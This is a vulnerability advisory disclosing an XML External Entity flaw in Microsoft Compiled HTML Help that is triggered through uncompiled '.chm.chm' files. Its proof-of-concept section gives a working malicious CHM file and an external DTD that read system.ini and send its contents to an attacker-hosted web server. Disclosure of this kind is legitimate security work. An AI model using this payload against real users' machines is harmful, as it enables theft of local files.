[**Fixed Typo] Microsoft Compiled HTML Help / Uncompiled .chm File XML External Entity

[apparitionsec () gmail com]

[+] Credits: John Page (aka hyp3rlinx)          
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-HTML-HELP-UNCOMPILED-CHM-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt
[+] ISR: ApparitionSec          


[Vendor]
www.microsoft.com


[Product]
Microsoft Compiled HTML Help "hh.exe"

Microsoft Compiled HTML Help is a Microsoft proprietary online help format, consisting of a collection of HTML pages, 
an index and other navigation tools.
The files are compressed and deployed in a binary format with the extension .CHM, for Compiled HTML. The format is 
often used for software documentation.
CHM is an extension for the Compiled HTML file format, most commonly used by Microsoft's HTML-based help program.


[Vulnerability Type]
Uncompiled .CHM File XML External Entity Injection


[CVE Reference]
N/A


[Security Issue]
CHM Files are usually created using Microsofts "HTML Help Workshop" program. However, I find a way to bypass using this 
program and create them easily by
simply adding double .chm extension to the file ".chm.chm". Compiled HTML Help "hh.exe" will then respect and open it 
processing any JS/HTML/XML inside etc.
Compiled HTML Help is also vulnerable to XML External Entity attacks allowing remote attackers to steal and exfiltrate 
local system files.

Whats interesting about this one is we can create the file without using the "Microsoft HTML Help Workshop" program. 
Also, we can steal files without
having to use the "hhtctrl.ocx" ActiveX control CLASSID: 52a2aaae-085d-4187-97ea-8c30db990436 or other code execution 
methods. 

While CHM is already considered a "dangerous" file type and other type of attacks have already been documented. I 
thought this was an interesting way to
create CHM files "Uncompiled" bypassing the default creation steps while stealing local files in the process.

Note: User interaction is required to exploit this vulnerability.


[Exploit/POC]
1) python -m SimpleHTTPServer


2) "XXE.chm.chm"

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<Title>Uncompiled CHM File XXE PoC</Title>
</HEAD>
<BODY>
<xml>
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE tastyexploits [ 
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://localhost:81/payload.dtd";>
%dtd;]>
<pwn>&send;</pwn>
</xml>
</BODY>
</HTML>


3) "payload.dtd"  (hosted in python web-server dir port 81 above)

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:81?%file;&apos;>">
%all;


Open the "XXE.chm.chm" file and will exfil Windows "system.ini", attacker Server IP is set to localhost using port 81 
for PoC.

Tested successfully Windows 7/10


[POC Video URL]
https://www.youtube.com/watch?v=iaxp1iBDWXY


[Network Access]
Remote



[Severity]
High


[Disclosure Timeline]
Vendor Notification: April 25, 2019
MSRC Response: "We determined that this behavior is considered to be by design"
July 16, 2019 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use 
or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by 
reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided 
that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no 
responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security 
related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx